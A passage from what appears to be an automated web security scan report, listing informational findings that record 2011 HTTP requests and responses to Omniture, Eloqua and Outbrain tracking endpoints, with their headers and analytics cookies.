%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 26 Feb 2011 16:31:16 GMT
Last-Modified: Mon, 28 Feb 2011 16:31:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www631
Content-Length: 0
Content-Type: text/plain


7.356. http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://networksolutions.112.2o7.net
Path:   /b/ss/netsolglobal/1/H.21.1/s19329686376731

Request

GET /b/ss/netsolglobal/1/H.21.1/s19329686376731?AQB=1&ndh=1&t=27%2F1%2F2011%2010%3A44%3A17%200%20360&ce=UTF-8&ns=networksolutions&pageName=net%7C%20domain-name-registration%3Edomain-name-search-results.jsp&g=http%3A%2F%2Fwww.networksolutions.com%2Fdomain-name-registration%2Fdomain-name-search-results.jsp%3FisExplicitSearchAvailable%3Dtrue%26dontShowCountrySearchLink%3Dtrue&cc=USD&events=event5&v14=net%7C%20domain-name-registration%3Edomain-name-search-results.jsp%3ASearchResultsForm%3A(No%20Data%20Entered)&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev1=http%3A%2F%2Fwww.networksolutions.com%2Fdomain-name-registration%2F%23&pev2=Form%20Analysis&AQE=1 HTTP/1.1
Host: networksolutions.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.networksolutions.com/domain-name-registration/domain-name-search-results.jsp?isExplicitSearchAvailable=true&dontShowCountrySearchLink=true
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 27 Feb 2011 16:44:18 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26B53FB10515B452-40000174A00736DB[CE]; Expires=Fri, 26 Feb 2016 16:44:18 GMT; Domain=networksolutions.112.2o7.net; Path=/
Location: http://networksolutions.112.2o7.net/b/ss/netsolglobal/1/H.21.1/s19329686376731?AQB=1&pccr=true&vidn=26B53FB10515B452-40000174A00736DB&&ndh=1&t=27%2F1%2F2011%2010%3A44%3A17%200%20360&ce=UTF-8&ns=networksolutions&pageName=net%7C%20domain-name-registration%3Edomain-name-search-results.jsp&g=http%3A%2F%2Fwww.networksolutions.com%2Fdomain-name-registration%2Fdomain-name-search-results.jsp%3FisExplicitSearchAvailable%3Dtrue%26dontShowCountrySearchLink%3Dtrue&cc=USD&events=event5&v14=net%7C%20domain-name-registration%3Edomain-name-search-results.jsp%3ASearchResultsForm%3A(No%20Data%20Entered)&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev1=http%3A%2F%2Fwww.networksolutions.com%2Fdomain-name-registration%2F%23&pev2=Form%20Analysis&AQE=1
X-C: ms-4.3.1
Expires: Sat, 26 Feb 2011 16:44:18 GMT
Last-Modified: Mon, 28 Feb 2011 16:44:18 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www365
Content-Length: 0
Content-Type: text/plain


7.357. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=70&siteid=1137&ref=http://telligent.com/products/telligent_community/&ms=865 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 271
Content-Type: text/html; charset=utf-8
Location: http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=70&siteid=1137&ref=http://telligent.com/products/telligent_community/&ms=865&elqCookie=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ELOQUA=GUID=D75074D525984768B09525294A871F20; domain=.eloqua.com; expires=Sun, 01-Dec-2030 02:30:00 GMT; path=/
Set-Cookie: ELQSTATUS=OK; domain=.eloqua.com; expires=Sun, 01-Dec-2030 02:30:00 GMT; path=/
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:00:07 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=70&amp;siteid=1137&amp;ref=http://telligent.com/products/telligent_
...[SNIP]...

7.358. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Request

GET /utils/get?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglish&srcUrl=http%3A%2F%2Fwww.project-syndicate.org%2Fps.rss&callback=outbrain_rater.returnedOdbData(${json},0)&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=http%3A%2F%2Fwww.project-syndicate.org%2Fseries_metacategory%2F1&apv=false&rand=0.30198374507017434&sig=MFI5rkXT HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; tick=1298762067789; _lvs2="7/zvT3TaXCJmXWbf0AnD2g=="; _lvd2="TGFbkTwVuWjGFc5yucapKSBCwhFyDu0O/rD7Y+sps3IM26jv55WTP50dA5llc+29lj+KhjX8XO/rFZEW/H8yHd/TiBOAEFP+PpX1+pWb9BQhLzw31Ubh8XF7PN5pqv6Hoq1d0FAvWZs="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298773208694; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCK0krVu88rKjAAVdQRkoEtA"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 25-Mar-2012 02:20:08 GMT; Path=/
Set-Cookie: _lvd2="TGFbkTwVuWixqhsiwJ8TAepQLJgWXZfdNIu9f5l+OS6gzcir3Eb1qi/hWHlDIz1xxhXOcrnGqSm4ucaLzsE2xaFT6Ux7nklHsoAAsfcum13E9PftLstsJgk1xFTs+GRnsDr/B6P5TjQ="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 05-Mar-2011 15:08:08 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 25-Mar-2012 02:20:08 GMT; Path=/
Set-Cookie: recs-2b1934f3579c75cb5f9e0112a658c166="x8RKL+xbc5E7SMu/YBrk5Xfcep9oRQ1jjEFVebYmJRhbQ2RNRftjnCVUYzt++2bcMAhfC85og43hjZ+ZiaaL4VFrnoV8o4/t/jZq0NV1zKMHwh1VAQruTQJn4vlBKmKu9dWc+zLXPjGl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 27-Feb-2011 02:25:08 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 02:20:07 GMT
Content-Length: 6841

outbrain_rater.returnedOdbData({'response':{'exec_time':29,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'189333928','req_id':'484f9dddc64f01285c6f669b94efd0af'},'score':{'preferred
...[SNIP]...

7.359. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Request

GET /utils/get?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglish&srcUrl=http%3A%2F%2Fwww.project-syndicate.org%2Fps.rss&callback=outbrain_rater.returnedOdbData(${json},0)&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=&apv=false&rand=0.45172540890052915&sig=MqyMTGxq HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; tick=1298773208486; _lvs2="7/zvT3TaXCK0krVu88rKjAAVdQRkoEtA"; _lvd2="TGFbkTwVuWixqhsiwJ8TAepQLJgWXZfdNIu9f5l+OS6gzcir3Eb1qi/hWHlDIz1xxhXOcrnGqSm4ucaLzsE2xaFT6Ux7nklHsoAAsfcum13E9PftLstsJgk1xFTs+GRnsDr/B6P5TjQ="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; recs-2b1934f3579c75cb5f9e0112a658c166="x8RKL+xbc5H8H0uKUnOSCzgOSSw2lMy/cakXYY4HM438+U/y/a9lSGCsM7MxnvFbReSNNhAqt2AaqAtd7C8BmPqBLm06q2Wk9PzjPi9ySt6Bq1nWi5CxlWuMCf8+JxRbSHKHHEchiNyl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298773243307; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCK0krVu88rKjAAVdQRkoEtA"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 25-Mar-2012 02:20:43 GMT; Path=/
Set-Cookie: _lvd2="TGFbkTwVuWixqhsiwJ8TAepQLJgWXZfdNIu9f5l+OS6gzcir3Eb1qi/hWHlDIz1xxhXOcrnGqSm4ucaLzsE2xaFT6Ux7nklHsoAAsfcum13E9PftLstsJgk1xFTs+GRnsDr/B6P5TjQ="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 05-Mar-2011 15:08:43 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 25-Mar-2012 02:20:43 GMT; Path=/
Set-Cookie: recs-7794d7544309bcf8a444ba51e764e8e5="x8RKL+xbc5E7SMu/YBrk5Xfcep9oRQ1juHbUwBM6UqKoX2iki6rPy9SukeMYbmRZJQkNS7JudehVmXzXGOey9YxBVXm2JiUYyGTRvrLUx5YjHXucE+2M/NKSWWxPY/Uc82P4g59W/5Wl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 27-Feb-2011 02:25:43 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 02:20:42 GMT
Content-Length: 6781

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'189333928','req_id':'7182854822444310e54b728a35d00568'},'score':{'preferred
...[SNIP]...

7.360. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Request

GET /utils/get?url=http%3A%2F%2Fioerror.us%2F2008%2F06%2F26%2Fsmithsburg-md%2F&srcUrl=http%3A%2F%2Fioerror.us%2Ffeed%2F&callback=outbrain_rater.returnedOdbData(${json},2)&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=2&version=34924&ref=&apv=false&rand=0.38633768586441875&sig=RKWTKL3v HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; tick=1298762046891; _lvs2="7/zvT3TaXCJmXWbf0AnD2g=="; _lvd2="p47tkLgO+tfGFc5yucapKfyD0IjX8mLGMilTxeRuEiA="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; recs-74e9af2a662553ecf44292c20c4860dc="MvvIA5NJ5MZrk9XRnkvBgnA/Vua4ayltHQqf9boXCTcncIH2cDulx4SYWY37VLWNwDYEs4IWO1QMnPKi7CwxPKjYjPEsyq7rxWBUF33wH43Pe3G7iJZQl9PR1Z6o06ly"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298762047213; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCJmXWbf0AnD2g=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:14:07 GMT; Path=/
Set-Cookie: _lvd2="p47tkLgO+tfGFc5yucapKfyD0IjX8mLGCX78Xv5OujhoALIVah2ijw=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 05-Mar-2011 12:02:07 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:14:07 GMT; Path=/
Set-Cookie: recs-74e9af2a662553ecf44292c20c4860dc="MvvIA5NJ5MZrk9XRnkvBgnA/Vua4ayltHQqf9boXCTcncIH2cDulx4SYWY37VLWNwDYEs4IWO1QMnPKi7CwxPKjYjPEsyq7rxWBUF33wH41ZQRJ86068OT7mrJqwX6+9UmIFEypG7wriIEk6o6nDQVn7vRq76nxlKNVKISEnv3IyYKB3eHm4RQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sat, 26-Feb-2011 23:19:07 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 23:14:06 GMT
Content-Length: 2928

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'183663855','req_id':'67e6beb3112858539d14cd51a7f15a64'},'score':{'preferred
...[SNIP]...

7.361. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Request

GET /utils/get?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Ffischer60%2FEnglish&srcUrl=http%3A%2F%2Fwww.project-syndicate.org%2Fps.rss&callback=outbrain_rater.returnedOdbData(${json},0)&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=http%3A%2F%2Fwww.project-syndicate.org%2Fcontributor%2F886&apv=false&rand=0.9315663923043758&sig=display HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/fischer60/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; recs-2b1934f3579c75cb5f9e0112a658c166="x8RKL+xbc5H8H0uKUnOSCzgOSSw2lMy/cakXYY4HM438+U/y/a9lSGCsM7MxnvFbReSNNhAqt2AaqAtd7C8BmPqBLm06q2Wk9PzjPi9ySt6Bq1nWi5CxlWuMCf8+JxRbSHKHHEchiNyl+Ov6ordflA=="; tick=1298773243115; _lvs2="7/zvT3TaXCK0krVu88rKjAAVdQRkoEtA"; _lvd2="TGFbkTwVuWixqhsiwJ8TAepQLJgWXZfdNIu9f5l+OS6gzcir3Eb1qi/hWHlDIz1xxhXOcrnGqSm4ucaLzsE2xaFT6Ux7nklHsoAAsfcum13E9PftLstsJgk1xFTs+GRnsDr/B6P5TjQ="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; recs-7794d7544309bcf8a444ba51e764e8e5="x8RKL+xbc5HPZElaZTQEQCOKfhnA/Cm05ekeCNZA7zpbQ2RNRftjnI1bBrMX8TMM7UxDNtm+6jtAHLmoeMt5/9HUOmm71FGQarivG0q6JKlFlVoMHXZGE1iSQi/ii31Lke/7I6T/CjGl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298773261892; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCK0krVu88rKjAAVdQRkoEtA"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 25-Mar-2012 02:21:01 GMT; Path=/
Set-Cookie: _lvd2="TGFbkTwVuWgKhxlTP9TZOZoScU212kwgZq632xDhm8PlLPArPxbe5T7mrJqwX6+9IAg7B4RIeSJpLna+3Biogin/n9AhMTv/UGTx8MJ8o8pnIDWTINPIJ4QlWd9yPgPTWF/xy/Sz58Y="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 05-Mar-2011 15:09:01 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 25-Mar-2012 02:21:01 GMT; Path=/
Set-Cookie: recs-ebf78b512222fe4dcd14e7d5060a15b0="1VFOR/8MCQ1UGnrm1UFV3F50mgsUJ5echnEKnV8cmflJaChwxu1akQWYCHUuuwetlvSPRnZve+ZUTXsV9SdJbv89AsbLe0TEmn/jQ6Z60GO7BqzgOwEzik4nfkSqvn5CbGmSlBRUU22l+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 27-Feb-2011 02:26:01 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 02:21:01 GMT
Content-Length: 6737

outbrain_rater.returnedOdbData({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'189359074','req_id':'5cbec2ce85f26fcee1fb7a7e955cb150'},'score':{'preferred
...[SNIP]...

7.362. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s53765518721193  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s53765518721193

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s53765518721193?AQB=1&pccr=true&&ndh=1&t=26/1/2011%2017%3A18%3A13%206%20360&ce=UTF-8&pageName=Dialogue%20Welcome%20Page%3AWWMK09049794MP%3A6804803%3A8810727%3A24&g=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24&r=http%3A//www.oracle.com/pls/www/go.lp%3Fkw%3D%26Src%3D6804803%26Act%3D24%26pcode%3DWWMK09049794MPP029%26refer%3Dhttp%253A//eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp%253Fp_eventId%253D117156%2526src%253D6804803%2526src%253D6804803%2526Act%253D40&cc=USD&ch=Landing%20Pads&events=event1&v1=WWMK09049794MP%3A6804803%3A8810727%3A24&c20=New&v20=New&v26=Landing%20Pads&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8810727&src=6804803&Act=24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4D698A26[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C55005012763-40000117003FDB75|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:20:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|26B4C55005012763-40000117003FDB7A|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:20:00 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Fri, 25 Feb 2011 23:20:00 GMT
Last-Modified: Sun, 27 Feb 2011 23:20:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D698AA0-4EA5-0CC80860"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www184
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.363. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s55347714372910  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s55347714372910

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s55347714372910?AQB=1&ndh=1&t=26/1/2011%2017%3A28%3A8%206%20360&g=http%3A//www.oracle.com/index.html&r=http%3A//landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8810727%26src%3D6804803%26Act%3D24&c20=New&v20=New&c24=no%20value&v24=no%20value&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1437&bh=954&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=http%3A//www.oracle.com/index.html&oid=ocom%3Aen%3Ahpdl%3Ajava%20for%20developers&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:27:53 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:27:53 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; Expires=Thu, 25 Feb 2016 23:27:53 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Fri, 25 Feb 2011 23:27:53 GMT
Last-Modified: Sun, 27 Feb 2011 23:27:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D698C79-10DA-2C082050"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www6
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.364. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s55552479997  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s55552479997

Request

